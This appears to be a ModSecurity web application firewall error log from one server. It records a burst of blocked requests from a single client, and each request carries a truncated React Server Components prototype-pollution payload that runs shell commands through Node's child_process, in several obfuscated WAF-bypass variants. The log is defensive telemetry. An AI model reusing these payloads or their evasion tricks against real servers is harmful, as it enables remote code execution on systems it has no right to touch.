"(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/dashboard"] [unique_id "adJmzEI7AjfUQYCN-J7DoAAAANI"] [Sun Apr 05 15:42:36.594670 2026] [:error] [pid 23077:tid 23088] [client 172.94.9.253:43342] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/app"] [unique_id "adJmzJc83uMXRUE9zvQS9AAAAcU"] [Sun Apr 05 15:42:36.594743 2026] [:error] [pid 13019:tid 13258] [client 172.94.9.253:43352] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/admin"] [unique_id "adJmzLxQSOrq_iRTM7dpswAAARI"] [Sun Apr 05 15:42:36.662195 2026] [:error] [pid 13019:tid 13251] [client 172.94.9.253:43336] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/admin"] [unique_id "adJmzLxQSOrq_iRTM7dptAAAAQs"] [Sun Apr 05 15:42:36.663026 2026] [:error] [pid 31198:tid 31272] [client 172.94.9.253:43320] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/app"] [unique_id "adJmzDT5TgrBR8xRnfXA9AAAAVQ"] [Sun Apr 05 15:42:36.664046 2026] [:error] [pid 13019:tid 13264] [client 172.94.9.253:43302] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/admin"] [unique_id "adJmzLxQSOrq_iRTM7dptQAAARg"] [Sun Apr 05 15:42:36.665620 2026] [:error] [pid 1503:tid 1522] [client 172.94.9.253:43392] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/admin"] [unique_id "adJmzEI7AjfUQYCN-J7DoQAAAM0"] [Sun Apr 05 15:42:36.684919 2026] [:error] [pid 23077:tid 23106] [client 172.94.9.253:43286] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/admin"] [unique_id "adJmzJc83uMXRUE9zvQS9QAAAdc"] [Sun Apr 05 15:42:36.716861 2026] [:error] [pid 13019:tid 13243] [client 172.94.9.253:43306] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/app"] [unique_id "adJmzLxQSOrq_iRTM7dptgAAAQM"] [Sun Apr 05 15:42:36.717918 2026] [:error] [pid 23077:tid 23089] [client 172.94.9.253:43400] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/app"] [unique_id "adJmzJc83uMXRUE9zvQS9gAAAcY"] [Sun Apr 05 15:42:36.732793 2026] [:error] [pid 13019:tid 13242] [client 172.94.9.253:43412] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/admin"] [unique_id "adJmzLxQSOrq_iRTM7dptwAAAQI"] [Sun Apr 05 15:42:36.737739 2026] [:error] [pid 13019:tid 13246] [client 172.94.9.253:43424] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/admin"] [unique_id "adJmzLxQSOrq_iRTM7dpuAAAAQY"] [Sun Apr 05 15:42:36.744006 2026] [:error] [pid 13019:tid 13258] [client 172.94.9.253:43434] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/admin"] [unique_id "adJmzLxQSOrq_iRTM7dpuQAAARI"] [Sun Apr 05 15:42:36.747586 2026] [:error] [pid 13019:tid 13244] [client 172.94.9.253:43436] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/app"] [unique_id "adJmzLxQSOrq_iRTM7dpuwAAAQQ"] [Sun Apr 05 15:42:36.751019 2026] [:error] [pid 13019:tid 13253] [client 172.94.9.253:43426] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/admin"] [unique_id "adJmzLxQSOrq_iRTM7dpugAAAQ0"] [Sun Apr 05 15:42:36.799173 2026] [:error] [pid 13019:tid 13251] [client 172.94.9.253:43476] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/app"] [unique_id "adJmzLxQSOrq_iRTM7dpvgAAAQs"] [Sun Apr 05 15:42:36.799864 2026] [:error] [pid 13019:tid 13245] [client 172.94.9.253:43460] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/admin"] [unique_id "adJmzLxQSOrq_iRTM7dpvwAAAQU"] [Sun Apr 05 15:42:36.809124 2026] [:error] [pid 13019:tid 13246] [client 172.94.9.253:43486] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/app"] [unique_id "adJmzLxQSOrq_iRTM7dpwAAAAQY"] [Sun Apr 05 15:42:36.830421 2026] [:error] [pid 23077:tid 23094] [client 172.94.9.253:43494] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/app"] [unique_id "adJmzJc83uMXRUE9zvQS9wAAAcs"] [Sun Apr 05 15:42:36.835654 2026] [:error] [pid 13019:tid 13254] [client 172.94.9.253:43496] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match 